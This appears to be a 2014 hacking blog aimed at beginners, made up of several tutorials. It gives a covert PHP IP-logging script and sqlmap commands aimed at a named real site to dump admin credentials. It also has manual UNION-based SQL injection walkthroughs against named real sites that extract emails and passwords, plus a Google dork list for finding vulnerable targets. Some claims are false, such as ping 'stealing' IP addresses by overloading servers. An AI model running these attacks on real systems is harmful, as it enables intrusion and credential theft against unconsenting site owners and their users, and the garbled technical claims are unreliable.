C-T-H

Hacking - Official weblog, with update of new Hacking Tips, Tricks and Security Tips for Beginners Guide inside internet world.

A blog (a truncation of the expression web log is a discussion or informational site published on the World Wide Web and consisting of discrete entries ("posts") typically displayed in reverse chronological order (the most recent post appears first).Find out more...


Following are the some of the Advantages of Come To Hack :-

  • Easy to Learn Step by Step.
  • Best for Hacking Beginners.
  • It’s beautiful Place to learn Professionl Hacking Easily

Wednesday, 17 December 2014

// // Leave a Comment

How to Locate a Computer With an IP address

[i]

IP stands for Internet Protocols. An IP address is the address for servers and a person's computer who is connected to the internet. Everyone on the internet has an IP address, and once you find out what it is, you know exactly where they are, and you can begin to hack them.
Internet Protocols Addresses are usually made up of random numbers separated by dots. Every IP address is unique, no one can have the same one. This is why it is very important that you're careful when typing, you do NOT want to accidentally hack the wrong person/network.

Examples:

  • 66.17.44.186
  • 81.73.50.42
  • 192.168.1.1
  • 127.0.0.1
  • 84.10.1.5982
  • 17.44.186
  • 816.83.337.04
Obtaining a target's IP is address is the first step to prepare for an attack. Explained below are methods of obtaining a victim's IP address.

Ping - the easiest way to steal an IP

Ping is a tool used to endlessly make requests to a server or another person. It works with both IP address or domain names. Domain names are the addresses that you type in to go to a website. Domain names are easier to remember, which is why the internet was invented.
Either way, by pinging a site, you can easily over-load it with requests, and at the same time obtain the IP. Ping is supported in Microsoft DOS, as shown below:



As you see, the hacker here is using Windows XP (a good choice), and in order to get the IP of cometohack.com, the only thing he had to do was open up a DOS prompt and type in ping cometohack.com. Upon doing so, cometohack.com was instantly hit with 4 requests which distracted their server long enough in order for Ping to steal the IP address.


[ii]

An ultimate hack which enable u to trace any one any where in the world


Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. Finding out someone's IP address is like finding their phone number, an IP address can be used to find the general location where that person lives. Now while most of the tutorials on the net teach you how to steal an ip address via MSN, or any other chat software, in this post I’ll show you how to find IP address of someones computer using script. Using this method for hacking someones ip adress is very easy and effectively, so just follow the steps bellow.

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.

How to Hack Someones IP Address?


Alright, I'm gonna give you this script, that you write in the index.php. It will redirect them to http://www.google.com/, but you can change that in the script.

Here is the sript:

Code:


<?php
$file = 'IPz.txt';
$handle = fopen($file,'a');
if(!isset($_GET['p'])) { header('Location: http://google.com'); }
fwrite($handle, $_GET['p'].': '.$_SERVER['REMOTE_ADDR'].'\r\n');
fclose($handle)
?>

1. First of all you need to make a new .txt document on the website you're uploading this to. Call it IPz.txt (You can change that in the script as well where it says $file = 'IPz.txt'; in the second line. Then change the CHMOD to 777.

2. Now you need to past the script above in to a .php document, and upload it.

3. Now you make people visit your site, and they will get redirected to Google.

4. To view the IP, you simply add "/IPz.txt" after your domain, and you'll see the IP.


This is a very simple, but effectually method for stealing someones IP Address.
Hope you'll find this tutorial useful. Happy Hacking :)
Read More

Friday, 12 December 2014

// // Leave a Comment

12 Simple Steps To Become A Hacker


Steps to become a hacker
Hacking is an engaging field but it is surely not easy. To become a hacker one has to have an attitude and curiosity of learning and adapting new skills. You must have a deep knowledge of computer systems, programming languages, operating systems and the journey of learning goes on and on. Some people think that a hacker is always a criminal and do illegal activities but they are wrong. Actually many big companies hire hackers to protect their systems and information and are highly paid. We have prepared a list of 12 most important steps necessary to become a hacker, have a deeper look

1. Learn UNIX/LINUX

linux operating system
UNIX/LINUX is an open source operating system which provides better security to computer systems. It was first developed by AT&T in Bell labs and contributed a lot in the world of security. You should install LINUX freely available open source versions on your desktops as without learning UNIX/LINUX, it is not possible to become a hacker.


2. Code in C language 

c programming
C programming is the base of learning UNIX/LINUX as this operating system is coded in C programming which makes it the most powerful language as compared to other programming languages. C language was developed by Dennis Ritchie in late 1970’s. To become a hacker you should master C language.

3. Learn to code in more than one Programming Language

programming languages

It is important for a person in the hacking field to learn more than one programming. There are many programming languages to learn such as Python, JAVA, C++. Free eBooks, tutorials are easily available online.

4. Learn Networking Concepts

computer networking
Another important and essential step to become a hacker is to be good at networking concepts and understanding how the networks are created. You need to know the differences between different types of networks and must have a clear understanding of TCP/IP and UDP to exploit vulnerabilities (loop holes) in system.
Understanding what LAN, WAN, VPN, Firewall is also important.
You must have a clear understanding and use of network tools such as Wireshark, NMAP for packet analyzing, network scanning etc.

5. Learn More Than One Operating Systems 

operating system
It is essential for a hacker to learn more than one operating system. There are many other Operating systems apart from Windows, UNIX/LINUX etc. Every system has a loop hole, hacker needs it to exploit it.

6. Learn Cryptography

cryptography encryption
To become a successful hacker you need to master the art of cryptography. Encryption and Decryption are important skills in hacking. Encryption is widely done in several aspects of information system security in authentication, confidentiality and integrity of data. Information on a network is in encrypted form such as passwords. While hacking a system, these encrypted codes needs to be broken, which is called decryption.

7. Learn more and more about hacking

hacking or hackers
Go through various tutorials, eBooks written by experts in the field of hacking. In the field of hacking, learning is never ending because security changes every day with new updates in systems.

8. Experiment A Lot

experiment
After learning some concepts, sit and practice them. Setup your own lab for experimental purpose. You need a good computer system to start with as some tools may require powerful processor, RAM etc. Keep on Testing and learning until you breach a system.

9. Write Vulnerability (Loop hole program)

hacking vulnerability

Vulnerability is the weakness, loop hole or open door through which you enter the system. Look for vulnerabilities by scanning the system, network etc. Try to write your own and exploit the system.


10. Contribute To Open Source Security Projects

open source software
An open source computer security project helps you a lot in polishing and testing your hacking skills. It’s not a piece of cake to get it done. Some organizations such as MOZILLA, APACHE offer open source projects. Contribute and be a part of them even if your contribution is small, it will add a big value to your field.

11. Continue never ending Learning 

learning hacking
Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker. Keep yourself updated about security changes and learn about new ways to exploit systems

12. Join Discussions and meet hackers 

discussion
Most important for a hacker is to make a community or join forums, discussions with other hackers worldwide, so that they can exchange and share their knowledge and work as a team. Join Facebook groups related to hacking where you can get more from experts.
Read More

Saturday, 4 October 2014

// // Leave a Comment

How To Hack, Learn Hacking Step by Step [Videos Tut]

Shell Upload using Live http Header


shell upload using live http header from umer siddiqui on Vimeo.

----------------------------*-.-*---------------------------*-.-*--------

Hack Website using Arbitrary File





hack website using Arbitrary File Upload Vulnerability from umer siddiqui on Vimeo.


 ------------------------------*-.-*-------------------------------------*-.-*----

HTML File Upload Vulnerability



html file upload vulnerablity from umer siddiqui on Vimeo.

  ------------------------------*-.-*-------------------------------------*-.-*-----

Manual SQLi



sqli manual from umer siddiqui on Vimeo.

------------------------------*-.-*-------------------------------------*-.-*----

Shell Upload Vulnerability



Shell Upload Vulnerablity from umer siddiqui on Vimeo.

 ------------------------------*-.-*-------------------------------------*-.-*-------

How to Hack Website Using Sql Map

. . .
How to Hack Website Using Sql Map By Umer Siddiqui from umer siddiqui on Vimeo.
Read More

Saturday, 2 August 2014

// // 1 comment

How to install SQLMap on Windows XP/7/8

Welcome Back . ComeToHack Team's new post of the week. Last lecture was about

 " How To Hack Website Through SQLMap "


DoT Zeroo here today i gonna show you  how to install SQL.Map on Windows.

1st download python2.7 or sqlmap  after downloading install python2.7

follow me :-

open python2.7 setup and select Install for all user and hit next button


Install python On C Drive. click next

 Click next


Click Finish Button :D

After python installing complete Copy Sqlmap folder and past python2.7 folder


Ok now go to run and type cmd nad hit enter 


after opening command prompt Type follow coomand

How To Hack Website Manually Step by Step Guide Line.


1st "cd../" without quotes 

2nd once again type "cd../"


3rd type "cd python27" (you can change your python folder name)
now check this its working :P


3rd type "cd sqlmap" without quotes 



4th once again type same command "cd sqlmap"



Now your sqlmap is installed ;) i hope you like this tutorial

That's it about SQLMap


Like :- www.facebook.com/cometohack
Read More

Monday, 14 July 2014

// // 1 comment

How To Hack Website Through SQLMAP (Step By Step GuideLine)

Everyone who want to learn Hacking, he must have knowledge about sqlmap & site vulnerabilty.

Requirements :-
Python27 or Sqlmap and sqli vulnerability website 

if you don't have any vulnerability site using Google Dorks    

Lets start Open you terminal and run sqlmap 





Now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 --dbs" without quotes and hit enter 
(--db = Database)


you can see this we got 2 databses
 [*] c2deuts_ice
 [*] information_schema

now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice --tables" without quotes (-D mean database name and )


We got 25 tables  but we need only admin table 

now type "sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice -T admin --columns" without quotes (-T put table name )


you can see this we got admin usernames  and passwords for get password type follow commands

"sqlmap.py -u http://c2-europe.eu/news-full.php?id=1049 -D  c2deuts_ice -T admin -C username,password --dump" without quotes


you can see this wo got admin users and password 

Enjoy Happy hacking 
Like my page on facebook www.facebook.com/ComeToHack and share this tutorials 

Thanks for visiting :D

Read More

Monday, 30 June 2014

// // Leave a Comment

How to hack website manual (Full Guide)



Hello ComeToHack.com *-.-* 
                                               Once again ComeToHack here, today i gonna start Sqli Injection, today is First class so lets start.

Requirements :-

Firefox Browser


Vulnerability Site  

Ok i have already Vulnerability site like this

http://www.morephotosradio.com/transcript.php?interview_id=2021

Check this this website vulnerability yes or no, Put ' in the end of Url Like
  Step 1
=> http://www.morephotosradio.com/transcript.php?interview_id=2021'

yes i got a sql error you can see this

http://www.ComeToHack.com/
Step 2
=> Find tables numbers using order by--+- query For example

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 2--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 3--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 4--+-  (No Error)
http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 5--+-  (No Error)

http://www.ComeToHack.com/


and so on when we got Error this mean its table number like

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+-  (No Error)

http://www.ComeToHack.com/

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+-  ( Error)

http://www.ComeToHack.com/
its mean its have 46 table numbers

Step 3
=> Go to union based => Union statement and Select INT,INT

http://www.ComeToHack.com/


Step 4
=> Now enter table number value and click ok 

http://www.ComeToHack.com/

Step 5
=> after click ok you see this suto type 1 to 46 numbers then click Execute for checking its working 

http://www.ComeToHack.com/

Its working we can't got any error :D 

step 6
=> Put - in the end link values like this
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--+-

http://www.ComeToHack.com/

you can see this when we put - we go got Columns number is 6

Step 7
=> Now we need version :-
replace 6 number this query "version()"

http://www.ComeToHack.com/

you can see this we got sqli Version if you want more information like user name hostname and database use this query :-

For Version = version()
For Database = database()
For use = use()
For Host = host@@

Step 8
=> now we need table information so replace 6 number follow query "group_concat(table_name)" without quotes and in the end or url use this query "from information_Schema.tables wehre table schema=database()--+-" without quotes like

For Tables

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(tables_name),7,8,9,10,11,12,13,14,15,16,17,18,19
,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.tables where table_schema=database()--+-

http://www.ComeToHack.com/

you can see this we got all table names , we need admin user name because we wanna hack website :D

Step 9
=> now replace "database()" with User

http://www.ComeToHack.com/

Now select user and go to "sqli basics" and select "char()" then past "user" then click ok like 


http://www.ComeToHack.com/

And replace table with columns like this
For columns 
http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,
15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+-
 now click Execute  

http://www.ComeToHack.com/

Step 10
Now we need admin Email id and password now use this query 

replace column_name with which data we need and ,0x3a, mean when we need more data or in the end of url type table name

For data

http://www.morephotosradio.com/transcript.php?interview_id=-2021 +UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17
,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from User--+-

http://www.ComeToHack.com/

You can see this we got all admin emails and passwords ;) :D 

i hope you like this Tutorial 

Thanks for visiting
  


Read More

Saturday, 28 June 2014

// // Leave a Comment

How to Check all Data in Sqli Injection

Welcome ComeToHack *-.-*
                                                      Today i gonna show you how we can check all data in sqli site , we can check this all Tables , Columns , Database Name , Version User Host Etc Only in few minutes :D

Lest Stat

Requirements :-

=> Vulnerability Site: http://www.arts.cuhk.edu.hk/~lal/index.php?id=9
=> Sqli Codes

=> Now simple find web orders or Table Number like this


=> copy sqli code and replace 6 number 




 => After past code click Execute , you can see this we got all Tables columns and Databases or version :D


I hope you like this Tutorial ;) Thanks for Visiting like and share :)

Read More

Wednesday, 25 June 2014

// // Leave a Comment

SQL Injection [Hacking] Learn Step by Step


sql injection


Here you will find a very detailed, step by step tutorial written by me (@MaKhDooM_S) on SQL injection. This is purely for educational purposes and is to be used at the discretion of the reader.
First we have to know what SQL injection is exactly.

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.

That is the first paragraph of the wikipedia page for SQLi (SQL injection) found here:
http://en.wikipedia.org/wiki/SQL_injection

I would advise reading the entire page.

What is covered in this tutorial?

Part One - Website Assessment
Section One - Finding a vulnerable website
Section Two - Determining the amount of columns
Section Three - Finding which columns are vulnerable

Part Two - Gathering Information
Section One - Determining the SQL version
Section Two - Finding the database

Part Three - The Good Stuff
Section One - Finding the table names
Section Two - Finding the column names
Section Three - Displaying the column contents
Section Four - Finding the admin page

Now let's begin.

Part One - Website Assessment

In order for us to start exploiting a website we must first know exactly what we are injecting into. This is what we will be covering in Part One along with how to assess the information that we gather.

Section One - Finding a vulnerable website

Vulnerable websites can be found using dorks (I will include a list at the end of this tutorial), either in Google or with an exploit scanner. For those of you that are unfamiliar with the term "dorks", I will try to explain.

Dorks are website URLs that are known to be vulnerable. In SQL injection these dorks look like this:

Code:
inurl:buy.php?id=

This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection.

Now let's say we found the page:

Code:
http://www.site.com/buy.php?id=1

In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this:

Code:
http://www.site.com/buy.php?id=1'
or
http://www.site.com/buy.php?id='1

After pressing enter, if this website returns an error such as the following:

Code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7


Or something along those lines, this means it's vulnerable to injection.

In the case where you are to find a website such as this:

Code:
http://www.site.com/buy.php?id=1&dog;catid=2

Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this:

Code:
http://www.site.com/buy.php?id='1&dog;catid='2

There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways. I recommend the Exploit Scanner by Reiluke.

Section Two - Determining the amount of columns

In order for us to be able to use commands and get results we must know how many columns there are on a website. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command Biggrin

Sqli injection hacking

NOTE: SQL does not care whether or not your letters are capitalized or not and I'm just doing it out of clarity, for all it cares your queries could look like this:

Code:
http://www.site.com/buy.php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX

IT DOESN'T MATTER (btw please don't think that was an actual command).

So back to the ORDER BY command. To find the number of columns we write a query with incrementing values until we get an error, like this:

Code:

http://www.site.com/buy.php?id=1 ORDER BY 1-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 2-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 3-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 4-- <---No error
http://www.site.com/buy.php?id=1 ORDER BY 5-- <---ERROR!


This means that there are four columns!

DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.
VERY IMPORTANT!

Section Three - Finding which columns are vulnerable

So we know that there are four columns now we have to find out which ones are vulnerable to injection. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. There is also one other difference that is small in size but not in importance, see if you can spot it.

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,2,3,4--

If you couldn't spot the difference, it's the extra null in between the "=" sign and the value (the number).

buy.php?id=-1

Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place. Those are the numbers of the columns that are vulnerable to injection. We can use those columns to pull information from the database which we will see in Part Two.

Part Two - Gathering Information

In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.

Section One - Determining the SQL version.

Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. In this tutorial, I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it, it's not worth your time.

If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Using that information we can put together our next query (I will be using column 2). The command should look like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--

Because 2 is the vulnerable column, this is where we will place "@@version". Another string that could replace "@@version" is "version()".

If the website still does not display the version try using unhex(hex()) which looks like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

NOTE: If this method must be used here, it must be used for the rest of the injection as well.

Now what you want to see is something along these lines:

Code:
5.1.47-community-log

Which is the version of the SQL for the website.

NOTE: If you see version 4 and you would like to have a go at it, there are other tutorials that explain how to inject into it.

Section Two - Finding the database

Finding the name of the database is not always a necessary step to take to gather the information that you want, however in my experience folllowing these steps and finding the database may sometimes lead to a higher success rate.

To find the database we use a query like the one below:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This could sometimes return more results than necessary and so that is when we switch over to this query instead:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--

Congrats! You now have the name of the database! Copy and paste the name somewhere safe, we'll need it for later.

Part Three - The Good Stuff

This is the fun part where we will find the usernames, emails and passwords!

Section One - Finding the table names

To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look long and confusing but once you understand it, it really isn't so I'll try to explain. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.tables where the "table schema" (table_schema) can be found in the "database" (database()).

NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now.

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 30,1--

Notice how my limit was 30,1 instead of 31,1? This is because when using limit is starts from 0,1 which means that the 30th is actually the 31st Tongue

You now have all the table names!


sqli scanner hacking
Section Two - Finding the column names

Now that you have all of the table names try and pick out the one that you think would contain the juicy information. Usually they're tables like User(s), Admin(s), tblUser(s) and so on but it varies between sites.

After deciding which table you think contains the information, use this query (in my example, I'll be using the table name "Admin"):

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).

UPDATE: If you get an error at this point all you must do is follow these steps:

1. Copy the name of the table that you are trying to access.
2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".
Hex/Char Converter
http://www.swingnote.com/tools/texttohex.php
3. Click convert.
4. Copy the string of numbers/letters under Hex into your query so it looks like this:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice how before I pasted the hex I added a "0x", all this does is tells the server that the following characters are part of a hex string.

You should now see a list of all the columns within the table such as username, password, and email.

NOTE: Using the limit function does work with columns as well.

Section Three - Displaying the column contents

We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username", "password", and "email", and my database name will be "db123"). This is where the database name comes in handy:

Code:
http://www.site.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email),3,4 FROM db123.Admin--

In this query, 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that.

FINALLY! Now you have the login information for the users of the site, including the admin. All you have to do now is find the admin login page which brings us to Section Four.

Section Four - Finding the admin page

Usually the admin page will be directly off of the site's home page, here are some examples:

Code:
http://www.site.com/admin
http://www.site.com/adminlogin
http://www.site.com/modlogin
http://www.site.com/moderator

Once again there are programs that will find the page for you but first try some of the basic guesses, it might save you a couple of clicks. If you do use a program Reiluke has coded one for that as well. Search Admin Finder by Reiluke.

And that conlcudes my tutorial! I hope it was helpful to some of you. Remember to keep practicing and eventually you'll have all of the queries memorized in no time!

Comment and Rate!

Give credit where credit is due!

I do keep my promises so here is what I said I would include:

Dork List

trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
Read More